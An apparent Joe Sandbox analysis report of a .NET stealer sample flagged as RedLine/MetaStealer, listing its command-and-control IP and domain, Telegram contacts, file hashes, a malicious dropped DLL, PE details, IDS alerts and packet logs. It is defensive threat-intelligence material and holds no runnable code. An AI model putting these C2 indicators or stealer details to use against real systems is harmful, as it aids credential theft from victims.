                    http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyMSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponseMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/CancelMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementMSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousMSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2002/12/policyMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/sc/dkMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/IssueMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Contract/MSValue1ResponseDMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CommitMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/IssueMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCTMSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    157.90.30.125
                    		up.nexgor.topUnited States
                    		766REDIRISRedIRISAutonomousSystemESfalse
                    149.154.167.99
                    		t.meUnited Kingdom
                    		62041TELEGRAMRUtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1483330
                    Start date and time:2024-07-27 01:36:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 55s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:3
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:CCdaw0qbbo.exe
                    renamed because original name is a hash value
                    Original Sample Name:1c7fa29f87c23abfa490a5e8909a310a.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@4/3@2/2
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 334
                    • Number of non-executed functions: 29
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated

                    Warnings

                    • Execution Graph export aborted for target MSBuild.exe, PID 7060 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • VT rate limit hit for: CCdaw0qbbo.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    19:36:55API Interceptor25x Sleep call for process: MSBuild.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    157.90.30.1258bZMO28ywp.exeGet hashmaliciousRedLineBrowse
                      149.154.167.99http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                      http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • telegram.org/
                      http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                      • telegram.org/
                      http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                      • telegram.org/?setln=pl
                      http://makkko.kz/Get hashmaliciousUnknownBrowse
                      • telegram.org/
                      http://telegram.dogGet hashmaliciousUnknownBrowse
                      • telegram.dog/
                      LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                      • t.me/cinoshibot
                      jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                      • t.me/cinoshibot
                      vSlVoTPrmP.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                      • t.me/cinoshibot
                      RO67OsrIWi.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                      • t.me/cinoshibot

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      t.mehttp://cache.netflix.com.sg5.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      http://investors.spotify.com.th.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://app.gopay.co.id.sg1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://ava.game.naver.com.id.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://app.gopay.co.id.sg5.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      8bZMO28ywp.exeGet hashmaliciousRedLineBrowse
                      • 149.154.167.99
                      1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                      • 149.154.167.99
                      fps-booster.exeGet hashmaliciousStormKittyBrowse
                      • 149.154.167.99
                      LisectAVT_2403002A_138.exeGet hashmaliciousVidarBrowse
                      • 149.154.167.99
                      up.nexgor.top8bZMO28ywp.exeGet hashmaliciousRedLineBrowse
                      • 157.90.30.125

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      TELEGRAMRUhttp://cache.netflix.com.sg5.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      http://investors.spotify.com.th.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      http://investors.spotify.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      http://cache.netflix.com.sg3.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://app.gopay.co.id.sg1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://ava.game.naver.com.id.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://app.gopay.co.id.id.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://app.gopay.co.id.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      REDIRISRedIRISAutonomousSystemES8bZMO28ywp.exeGet hashmaliciousRedLineBrowse
                      • 157.90.30.125
                      93g0DCqh1e.elfGet hashmaliciousMiraiBrowse
                      • 150.128.212.86
                      https://www.congresosucv.com/maindeal/fxc/bWVsaXNzYS53aGl0ZWh1cnN0QGFmZm9yZGFibGVkZW50dXJlcy5jb20=Get hashmaliciousHTMLPhisherBrowse
                      • 157.90.130.199
                      arm7.elfGet hashmaliciousMiraiBrowse
                      • 156.35.111.180
                      https://congresosucv.com/maindeal/fxc/YWNjb3VudHNyZWNlaXZhYmxlQGpwcGx1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                      • 157.90.130.199
                      https://ct2js04.na1.hs-sales-engage.com/Ctc/WZ+23284/ct2jS04/Jl28VMXNW7lDv8P6lZ3pcW7ZvSkt6MxtHGW75LPC74_WQVJW97RzS-1GzsgxW3C0l_Q5BnT9bN8H3VR33SQqBW2xj6fW2G1vj7W1vQmnx4tpFQ3N6-0GlBxxYrsW5WBrqV2RzGftW7mZDfC1Dy31mW6vWVKv2V7CXvMgj_bPbsjJNMh557VRDNvWW28TBsF8__fxnW8Fkw7X2wH15rW2bC8lF4CvmFmW3YPzfn9dfdg2W21rDSg7NQTWTW4T1Qr332BlhxW3HrXy58sHJTZW6M_hNS8PR08hW24xNqt5j4lrYW2k34g-6kTtfyW3Xvg9S1G4MqXW1bdn612WRGqrW72hbk31k087YMynlNTXC0LnW17gLh62z8b5GW8Ng_NJ36m19cW7n6g5N7P_6vYW5fGSQc6gyGQfW87CCSh3HxZypN6LTCNhMj-M3N5kt3__49HXbN70w9lLFm9dGW4gBNMJ7TlT7yN98N7GkkML6bW4LLqWT3GhxjwW3ll4061rVnp5W10GR4v38YGF-N3Ygqt3DTHY3W25GD7J8CWGdRMKyr2CZw9NjW5dMl177CpSY-W61k25g3NdSV-W7t_-Hc2mk8vnW92FrHx40VXSgN7y9dkJjjgv6N88pC7SlHt0mW2qLnBF3YlRdNW3BTtG95kmr8qW1JgRPV1Tsgl6N82B0fNbG_HZN4-KZn_L56BTW5g-zV35PP3lfW1zzcXP2HpTtNW2Bxwjv5QqNpwW82x1v93sr-W5W4SFQBj8DtvcpW3G5Yzn5LKYq8W14jVYm6q01PbW3bcSfP8HWtYtW90J1y9303PYLW4zNDLT8FGHmjW6qwRRQ65_CWCW88Kngt4y81MyN1F6glnKx9YSW14_55B5Hs1sfW1x2y_B6D2Cz6VGR3n14wzw5RW3PxV7v2JRb7JVYsm3p3RcTmDf31zBrb04Get hashmaliciousHTMLPhisherBrowse
                      • 157.90.130.199
                      bJrO2iUerN.elfGet hashmaliciousUnknownBrowse
                      • 157.90.1.125
                      https://www.leaflogistic.co/Get hashmaliciousHTMLPhisherBrowse
                      • 157.90.4.17
                      7OFBdUtXsK.elfGet hashmaliciousMiraiBrowse
                      • 150.244.162.159
                      BfQ121ipnz.elfGet hashmaliciousMiraiBrowse
                      • 161.72.18.32

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      3b5074b1b5d032e5620f69f9f700ff0ehttp://investors.spotify.com.th.wuush.us.kg/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://phhqqzqh7ydp8nreby0mq5yfr8su0h93.ocalam.com:8443/impact?impact=shanmugasundaramGet hashmaliciousHTMLPhisherBrowse
                      • 149.154.167.99
                      http://apple.eph167.com/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://muscletherapytec.com/wp-admin/bvn2/sprom2/popular/4e3ca076003281dc76236e73f1cc5142Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      http://www.linktr.ee/debank.notificationGet hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://49moleraur.xyz/garantiGet hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://mettamaskextensiion.webflow.io/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://apple.onk615.com/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      http://apple.nfc657.com/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://ed1134lia490fnlr9sic4ds02igkkve0.ocalam.com:8443/impact?impact=sudhir.mathGet hashmaliciousHTMLPhisherBrowse
                      • 149.154.167.99

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CCdaw0qbbo.exe.log

                      Download File
                      Process:C:\Users\user\Desktop\CCdaw0qbbo.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):42
                      Entropy (8bit):4.0050635535766075
                      Encrypted:false
                      SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                      MD5:84CFDB4B995B1DBF543B26B86C863ADC
                      SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                      SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                      SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):2545
                      Entropy (8bit):5.330114603578639
                      Encrypted:false
                      SSDEEP:48:MxHKlYHKh3okHafHK7HKhBHKntHo6hAHKzeEHK8THQmHKtXoPHZHjHKx1qHDJHxQ:iqlYqh3okmq7qLqntI6eqzPqojqo5DqD
                      MD5:1595B4EFE2BAA94AB32704F5597A8AB7
                      SHA1:A36A1B272E7BDBA552509DE8464961560674E95A
                      SHA-256:040CA48320DFFD2C2567BB12AEB60CAD450547268FE1949ADF4EF7D86AFB15C0
                      SHA-512:FF0D89C5AB3CB22115B418E5A04E0AD76EFFADEC3D6CF07A8232FA3572564963C8D33B081B40C8E991226CEC1B217F4102C31F28C52C4252D12EB59409AE84F2
                      Malicious:false
                      Reputation:low
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7

                      C:\Users\user\AppData\Roaming\d3d9.dll

                      Download File
                      Process:C:\Users\user\Desktop\CCdaw0qbbo.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):286208
                      Entropy (8bit):6.836363651510998
                      Encrypted:false
                      SSDEEP:3072:kU1shOBTvlH9UMVT2fCX2OqpPIveuW5qi1VJnzMEUAmC23LCGch20f6XgKmv9/Pa:EhyvldhVUCGOKF1fMEkbRU2Nmv9tH
                      MD5:1DBBD0B6AF7F9543B6B930B58B089D74
                      SHA1:8CE8939D95775AFFCD2CBF70DC9E078F77E2F7C8
                      SHA-256:55647921432F0DFCF2E4A8455294DF3BE736C133BEAA58C977C18B49503984CE
                      SHA-512:D4424575C5659B8C5966C3A1692DF1416961FA4A8BD6407FA8722EE70F533908CDB5A3875D3D0FA06672DB3F2E5D9E8ADD1C1B33CC2232CDE12A9A91340B5A98
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 70%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.)...GQ..GQ..GQL.DP..GQL.BP..GQL.CP..GQL.FP..GQ z<Q..GQ..FQe.GQ.=BP..GQ.=CP..GQ.=DP..GQ..GQ..GQj=GP..GQj=EP..GQRich..GQ........................PE..L......f...........!...&.....N.......j.......0............................................@.........................@...x.......<............................p......`...................................@............0..P............................text...C........................... ..`.rdata..Vh...0...j..................@..@.data...\...........................@....reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):6.512175229216102
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      • Win32 Executable (generic) a (10002005/4) 49.78%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      • DOS Executable Generic (2002/1) 0.01%
                      File name:CCdaw0qbbo.exe
                      File size:566'784 bytes
                      MD5:1c7fa29f87c23abfa490a5e8909a310a
                      SHA1:35c09cc093085c3924cab4c34572387d920ac185
                      SHA256:3e0b58b606aeb4cbf53aa42f471ae31960309cb01e2a3872b1db400c9694012b
                      SHA512:5fce78d4a06352a5937b14b4a877be7a32874fc27e0f5dc409a1bddcd5526e534cf3f416a58b8e4de0a559043b0be4bfb57146b1682ba33806f47141b1cdb5dd
                      SSDEEP:12288:+CFjaM7SlWi+CqGndxB0T7JfdI0n3cTS+T54zfR2x/a/A2vz4UTKZLmRmV/MeiWE:+CtaM7kN+v4Fk7JfwuP
                      TLSH:26C4FCDD725072DFC85BC972CEA81C68EA6034BB871B9203906719EDDA5D89BCF150F2
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@................................

                      File Icon

                      Icon Hash:90cececece8e8eb0

                      Static PE Info

                      General

                      Entrypoint:0x48b9ae
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows cui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x669E1ECF [Mon Jul 22 08:56:47 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8b95c0x4f.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x8c0000x688.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x899b40x89a00243db76ffd89cb32c5bf99c40ab3da4aFalse0.5747864157584015data6.518019892291105IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0x8c0000x6880x800f342377a439cc7f7a0e009fe451d17cdFalse0.353515625data3.640401155471515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x8e0000xc0x20049f85e116ca241172bb8df972a900916False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_VERSION0x8c0a00x3fcdata0.40784313725490196
                      RT_MANIFEST0x8c49c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                      2024-07-27T01:36:55.043720+0200TCP2001689ET WORM Potential MySQL bot scanning for SQL server497313306192.168.2.4157.90.30.125
                      2024-07-27T01:36:55.993125+0200TCP2046105ET MALWARE Redline Stealer/MetaStealer Family TCP CnC Activity - MSValue (Outbound)497313306192.168.2.4157.90.30.125
                      2024-07-27T01:36:55.749095+0200TCP2046105ET MALWARE Redline Stealer/MetaStealer Family TCP CnC Activity - MSValue (Outbound)497313306192.168.2.4157.90.30.125
                      2024-07-27T01:36:57.930177+0200TCP2049282ET MALWARE MetaStealer Activity (Response)330649731157.90.30.125192.168.2.4

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 27, 2024 01:36:49.076293945 CEST49678443192.168.2.4104.46.162.224
                      Jul 27, 2024 01:36:49.357695103 CEST49675443192.168.2.4173.222.162.32
                      Jul 27, 2024 01:36:53.602925062 CEST49730443192.168.2.4149.154.167.99
                      Jul 27, 2024 01:36:53.602976084 CEST44349730149.154.167.99192.168.2.4
                      Jul 27, 2024 01:36:53.603044033 CEST49730443192.168.2.4149.154.167.99
                      Jul 27, 2024 01:36:53.620862961 CEST49730443192.168.2.4149.154.167.99
                      Jul 27, 2024 01:36:53.620886087 CEST44349730149.154.167.99192.168.2.4
                      Jul 27, 2024 01:36:54.287801027 CEST44349730149.154.167.99192.168.2.4
                      Jul 27, 2024 01:36:54.287887096 CEST49730443192.168.2.4149.154.167.99
                      Jul 27, 2024 01:36:54.290726900 CEST49730443192.168.2.4149.154.167.99
                      Jul 27, 2024 01:36:54.290745020 CEST44349730149.154.167.99192.168.2.4
                      Jul 27, 2024 01:36:54.291155100 CEST44349730149.154.167.99192.168.2.4
                      Jul 27, 2024 01:36:54.336694002 CEST49730443192.168.2.4149.154.167.99
                      Jul 27, 2024 01:36:54.384499073 CEST44349730149.154.167.99192.168.2.4
                      Jul 27, 2024 01:36:54.571439028 CEST44349730149.154.167.99192.168.2.4
                      Jul 27, 2024 01:36:54.571504116 CEST44349730149.154.167.99192.168.2.4
                      Jul 27, 2024 01:36:54.571523905 CEST44349730149.154.167.99192.168.2.4
                      Jul 27, 2024 01:36:54.571559906 CEST44349730149.154.167.99192.168.2.4
                      Jul 27, 2024 01:36:54.571564913 CEST49730443192.168.2.4149.154.167.99
                      Jul 27, 2024 01:36:54.571597099 CEST44349730149.154.167.99192.168.2.4
                      Jul 27, 2024 01:36:54.571624041 CEST49730443192.168.2.4149.154.167.99
                      Jul 27, 2024 01:36:54.571624041 CEST49730443192.168.2.4149.154.167.99
                      Jul 27, 2024 01:36:54.571641922 CEST49730443192.168.2.4149.154.167.99
                      Jul 27, 2024 01:36:54.571650028 CEST44349730149.154.167.99192.168.2.4
                      Jul 27, 2024 01:36:54.571698904 CEST44349730149.154.167.99192.168.2.4
                      Jul 27, 2024 01:36:54.571751118 CEST49730443192.168.2.4149.154.167.99
                      Jul 27, 2024 01:36:54.576978922 CEST49730443192.168.2.4149.154.167.99
                      Jul 27, 2024 01:36:55.043720007 CEST497313306192.168.2.4157.90.30.125
                      Jul 27, 2024 01:36:55.048618078 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:55.048724890 CEST497313306192.168.2.4157.90.30.125
